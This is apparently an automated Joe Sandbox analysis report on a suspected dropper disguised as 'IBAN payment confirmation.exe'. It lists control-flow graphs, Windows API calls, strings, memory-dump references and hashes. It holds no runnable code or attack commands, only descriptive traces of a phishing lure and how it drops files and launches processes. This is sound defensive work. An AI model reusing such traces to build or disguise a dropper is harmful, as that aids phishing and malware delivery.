                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp
                                                                                                                              • API String ID: 1356686001-3216935634
                                                                                                                              • Opcode ID: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                                              • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                              • Opcode Fuzzy Hash: 57df5d2fd497d946e5d44718c2ce9500a544491e1817e3951972c4e7e3852fff
                                                                                                                              • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 777 4015b9-4015cd call 402b3a call 4059e0 782 401614-401617 777->782 783 4015cf-4015eb call 405962 CreateDirectoryW 777->783 785 401646-402197 call 401423 782->785 786 401619-401638 call 401423 call 405eea SetCurrentDirectoryW 782->786 790 40160a-401612 783->790 791 4015ed-4015f8 GetLastError 783->791 798 4029c7-4029d6 785->798 786->798 800 40163e-401641 786->800 790->782 790->783 795 401607 791->795 796 4015fa-401605 GetFileAttributesW 791->796 795->790 796->790 796->795 800->798
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,771B2EE0,00405792,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\IBAN payment confirmation.exe"), ref: 004059EE
                                                                                                                                • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr,?,00000000,000000F0), ref: 00401630
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr, xrefs: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Mixerudstyr
                                                                                                                              • API String ID: 3751793516-3758315044
                                                                                                                              • Opcode ID: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                                              • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                              • Opcode Fuzzy Hash: 9bef887c5d5f536874f37580d62bfdc690f86322df1a9697a894e0e2e9f3eda4
                                                                                                                              • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 803 10001771-100017ad call 10001b3e 807 100017b3-100017b7 803->807 808 100018be-100018c0 803->808 809 100017c0-100017cd call 100022eb 807->809 810 100017b9-100017bf call 100022a1 807->810 815 100017fd-10001804 809->815 816 100017cf-100017d4 809->816 810->809 817 10001824-10001828 815->817 818 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 815->818 819 100017d6-100017d7 816->819 820 100017ef-100017f2 816->820 821 10001866-1000186c call 1000248d 817->821 822 1000182a-10001864 call 100015cc call 1000248d 817->822 843 1000186d-10001871 818->843 825 100017d9-100017da 819->825 826 100017df-100017e0 call 10002868 819->826 820->815 823 100017f4-100017f5 call 10002b23 820->823 821->843 822->843 836 100017fa 823->836 831 100017e7-100017ed call 1000260b 825->831 832 100017dc-100017dd 825->832 839 100017e5 826->839 842 100017fc 831->842 832->815 832->826 836->842 839->836 842->815 846 10001873-10001881 call 10002450 843->846 847 100018ae-100018b5 843->847 853 10001883-10001886 846->853 854 10001899-100018a0 846->854 847->808 849 100018b7-100018b8 GlobalFree 847->849 849->808 853->854 856 10001888-10001890 853->856 854->847 855 100018a2-100018ad call 10001555 854->855 855->847 856->854 858 10001892-10001893 FreeLibrary 856->858 858->854
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                                                • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                                                • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                                                • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                                                • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                                                • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                                                • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                                                • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1767494692-3916222277
                                                                                                                              • Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                              • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                                              • Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
                                                                                                                              • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 860 403062-403070 861 403072-403088 SetFilePointer 860->861 862 40308e-403097 call 40317d 860->862 861->862 865 403177-40317a 862->865 866 40309d-4030b0 call 405bd9 862->866 869 403163 866->869 870 4030b6-4030ca call 40317d 866->870 872 403165-403166 869->872 870->865 874 4030d0-4030d3 870->874 872->865 875 4030d5-4030d8 874->875 876 40313f-403145 874->876 879 403174 875->879 880 4030de 875->880 877 403147 876->877 878 40314a-403161 ReadFile 876->878 877->878 878->869 881 403168-403171 878->881 879->865 882 4030e3-4030ed 880->882 881->879 883 4030f4-403106 call 405bd9 882->883 884 4030ef 882->884 883->869 887 403108-40311d WriteFile 883->887 884->883 888 40313b-40313d 887->888 889 40311f-403122 887->889 888->872 889->888 890 403124-403137 889->890 890->882 891 403139 890->891 891->879
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                              • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PointerWrite
                                                                                                                              • String ID: x>A
                                                                                                                              • API String ID: 539440098-3854404225
                                                                                                                              • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                              • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                              • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                                              • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 892 405b85-405b91 893 405b92-405bc6 GetTickCount GetTempFileNameW 892->893 894 405bd5-405bd7 893->894 895 405bc8-405bca 893->895 897 405bcf-405bd2 894->897 895->893 896 405bcc 895->896 896->897
                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BBE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                                              • API String ID: 1716503409-3083371207
                                                                                                                              • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                              • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                              • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                              • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3585118688-0
                                                                                                                              • Opcode ID: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                                              • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                              • Opcode Fuzzy Hash: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
                                                                                                                              • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                              • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                              • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                              • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                              • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                              APIs
                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                              Strings
                                                                                                                              • Error launching installer, xrefs: 00405678
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                              • String ID: Error launching installer
                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                              • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                              • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                              • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                              • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IBAN payment confirmation.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061E1
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\IBAN payment confirmation.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061F5
                                                                                                                                • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00406208
                                                                                                                              • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00403347
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                              • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                              • API String ID: 4115351271-3049706366
                                                                                                                              • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                              • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                                              • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                              • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                              • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                              • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                              • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
